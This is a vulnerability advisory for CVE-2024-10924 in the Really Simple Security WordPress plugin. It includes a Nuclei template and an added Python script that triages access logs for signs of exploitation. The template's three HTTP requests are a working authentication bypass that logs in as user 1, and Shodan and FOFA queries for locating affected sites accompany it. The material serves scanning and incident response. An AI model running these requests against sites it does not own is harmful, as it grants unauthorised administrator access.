The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
PoC code [publicly available]
id: CVE-2024-10924

info:
  name: Really Simple Security < 9.1.2 - Authentication Bypass
  author: yaser_s
  severity: critical
  description: |
    The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
  remediation: Fixed in 9.1.2
  reference:
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
    - https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
    - https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10924
    cwe-id: CWE-288,CWE-306
    epss-score: 0.9395
    epss-percentile: 0.99877
    cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: really-simple-plugins
    product: really_simple_security
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/really-simple-ssl"
    fofa-query: body="/wp-content/plugins/really-simple-ssl"
  tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)"\}'
        internal: true

  - raw:
      - |
        POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user_id": 1,
          "login_nonce": "{{nonce}}",
          "redirect_to": "/wp-admin/"
        }

    matchers:
      - type: word
        part: body
        words:
          - '"redirect_to":"\/wp-admin\/"'
        internal: true

  - raw:
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Personal Options'

      - type: word
        part: content_type
        words:
          - 'text/html'
# digest: 4b0a00483046022100aa48dc31b68d5fa540953256b41aef6f9d77d3abb5ff0fcc108ed95abaaa0d77022100df97c4b975a67f1ba59aa9c329d1ccde8ef313e9cd7f15d84851fb484e797c77:922c64590222798bb761d5b6d8e72950
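For a site owner or responder, the useful question is whether the two-factor REST routes this template exercises were ever hit before the plugin was updated to 9.1.2. The following added example (not part of the Nuclei template and not the plugin's own code) is a small triage script over web-server access logs: it resolves both WordPress REST URL forms (`/wp-json/<route>` and `/?rest_route=/<route>`), records every successful call under `/reallysimplessl/v1/two_fa/`, and notes whether the same source address reached `/wp-admin/` afterwards, which is the sequence the template's three requests follow. The combined log format, the sample log lines and the "admin access after a two_fa call" heuristic are assumptions; legitimate users completing 2FA onboarding also call these routes, so a hit is a lead for review, not proof of compromise.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache/nginx combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Nov/2024:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "curl/8.4"
203.0.113.7 - - [20/Nov/2024:10:01:03 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 210 "-" "curl/8.4"
203.0.113.7 - - [20/Nov/2024:10:01:04 +0000] "GET /wp-admin/profile.php HTTP/1.1" 200 40210 "-" "curl/8.4"
198.51.100.4 - - [20/Nov/2024:10:05:00 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 210 "https://example.test/wp-login.php" "Mozilla/5.0"
192.0.2.9 - - [20/Nov/2024:10:07:30 +0000] "GET /wp-content/plugins/really-simple-ssl/assets/css/rsssl.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The plugin's two-factor REST namespace, taken from the template's request path.
TWO_FA_PREFIX = "/reallysimplessl/v1/two_fa/"


def rest_route(target):
    """Return the REST route for a request target, or None if it is not a REST call.

    WordPress accepts both /wp-json/<route> and /?rest_route=/<route>; the
    template uses the query-string form, so a detection must handle both.
    """
    parsed = urlparse(target)
    if parsed.path.startswith("/wp-json/"):
        return parsed.path[len("/wp-json"):]  # keep the leading slash
    route = parse_qs(parsed.query).get("rest_route")
    return route[0] if route else None


def parse_log(lines):
    """Yield parsed entries; lines that do not match the format are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            yield entry


def triage(lines):
    """Per source IP: successful two_fa REST calls, and whether /wp-admin/ was
    reached by that IP afterwards. Only IPs with at least one two_fa hit appear."""
    by_ip = defaultdict(lambda: {"two_fa_hits": [], "admin_after": False})
    for e in parse_log(lines):
        route = rest_route(e["target"])
        if route and route.startswith(TWO_FA_PREFIX) and e["status"] == 200:
            by_ip[e["ip"]]["two_fa_hits"].append(
                {"ts": e["ts"], "route": route, "referer": e["referer"], "ua": e["ua"]}
            )
        elif urlparse(e["target"]).path.startswith("/wp-admin/") and e["ip"] in by_ip:
            # Admin area reached after a two_fa call from the same address.
            by_ip[e["ip"]]["admin_after"] = True
    return dict(by_ip)


if __name__ == "__main__":
    for ip, info in triage(SAMPLE_LOG.splitlines()).items():
        flag = "REVIEW: admin access followed" if info["admin_after"] else "two_fa call only"
        print(f"{ip}: {len(info['two_fa_hits'])} two_fa hit(s); {flag}")
        for h in info["two_fa_hits"]:
            print(f"    {h['ts']} {h['route']} referer={h['referer']!r} ua={h['ua']!r}")
```

Run it against a real log with `triage(open("access.log").read().splitlines())`. An empty referer combined with a non-browser user agent, as in the first constructed source, is worth a closer look; the second source calls the same route from a page on the site, which is what a genuine onboarding flow looks like. Because the vulnerable code path is only reachable when the "Two-Factor Authentication" setting is enabled, sites with that setting off can treat hits as low priority, and every site should simply update to 9.1.2 or later.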